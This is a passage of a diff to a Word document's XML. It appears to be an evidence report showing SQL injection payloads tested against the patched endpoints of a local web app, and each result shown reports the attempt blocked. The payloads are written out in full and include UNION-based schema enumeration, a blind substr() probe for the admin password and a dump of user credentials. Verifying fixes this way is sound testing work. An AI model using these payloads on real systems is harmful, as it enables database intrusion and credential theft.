+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/safe/enrollment?reference=ENR-2026-001%27+AND+1%3D2+--+</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:pict w14:anchorId="72CC6C6F">
           <v:shape id="_x0000_i1056" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId34" o:title=""/>
           </v:shape>
@@ -6927,7 +7140,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 36 of 41</w:t>
+        <w:t>Page 37 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6963,104 +7176,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Sqli Advanced Columns Four</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ' ORDER BY 4 -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Literal search input; no injected rows.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:50.783Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/safe/courses?q=%27+ORDER+BY+4+--+</w:t>
+        <w:t>Safe Version Sql Injection Intermediate Infer A</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND substr((SELECT password FROM users WHERE username='admin'),1,1)='A' -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: No matching enrollment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:18.986Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target endpoint: http://localhost:8000/safe/enrollment. Exact encoded URL is in verification.json.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7085,7 +7297,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="20FB859A">
+        <w:pict w14:anchorId="2768C5F4">
           <v:shape id="_x0000_i1057" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId35" o:title=""/>
           </v:shape>
@@ -7114,7 +7326,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 37 of 41</w:t>
+        <w:t>Page 38 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7150,104 +7362,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Sqli Advanced Database</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ' UNION SELECT 'DATABASE',name,file FROM pragma_database_list -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Literal search input; no injected rows.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:51.315Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/safe/courses?q=%27+UNION+SELECT+%27DATABASE%27%2Cname%2Cfile+FROM+pragma_database_list+--+</w:t>
+        <w:t>Safe Version Sql Injection Intermediate Infer Z</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND substr((SELECT password FROM users WHERE username='admin'),1,1)='Z' -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: No matching enrollment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:19.551Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target endpoint: http://localhost:8000/safe/enrollment. Exact encoded URL is in verification.json.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7272,7 +7483,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="6C411A11">
+        <w:pict w14:anchorId="797EDD35">
           <v:shape id="_x0000_i1058" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId36" o:title=""/>
           </v:shape>
@@ -7301,7 +7512,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 38 of 41</w:t>
+        <w:t>Page 39 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7337,32 +7548,31 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Sqli Advanced Tables</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ' UNION SELECT 'TABLE',name,sql FROM sqlite_master WHERE type='table' -- </w:t>
+        <w:t>Safe Version Sql Injection Advanced Columns Three</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ' ORDER BY 3 -- </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7410,31 +7620,31 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:51.839Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/safe/courses?q=%27+UNION+SELECT+%27TABLE%27%2Cname%2Csql+FROM+sqlite_master+WHERE+type%3D%27table%27+--+</w:t>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:20.119Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/safe/courses?q=%27+ORDER+BY+3+--+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7459,7 +7669,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="1891F610">
+        <w:pict w14:anchorId="12F9239B">
           <v:shape id="_x0000_i1059" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId37" o:title=""/>
           </v:shape>
@@ -7488,7 +7698,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 39 of 41</w:t>
+        <w:t>Page 40 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7524,32 +7734,31 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Sqli Advanced Columns</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ' UNION SELECT 'COLUMN',name,type FROM pragma_table_info('users') -- </w:t>
+        <w:t>Safe Version Sql Injection Advanced Columns Four</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ' ORDER BY 4 -- </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7597,31 +7806,31 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:52.355Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/safe/courses?q=%27+UNION+SELECT+%27COLUMN%27%2Cname%2Ctype+FROM+pragma_table_info%28%27users%27%29+--+</w:t>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:20.734Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/safe/courses?q=%27+ORDER+BY+4+--+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7646,7 +7855,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="32998F44">
+        <w:pict w14:anchorId="7AD7B3C4">
           <v:shape id="_x0000_i1060" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId38" o:title=""/>
           </v:shape>
@@ -7675,7 +7884,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 40 of 41</w:t>
+        <w:t>Page 41 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7711,31 +7920,31 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>Safe Sqli Advanced Credentials</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ' UNION SELECT username,password,email FROM users -- </w:t>
+        <w:t>Safe Version Sql Injection Advanced Database</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ' UNION SELECT 'DATABASE',name,file FROM pragma_database_list -- </w:t>
       </w:r>
     </w:p>
     <w:p>
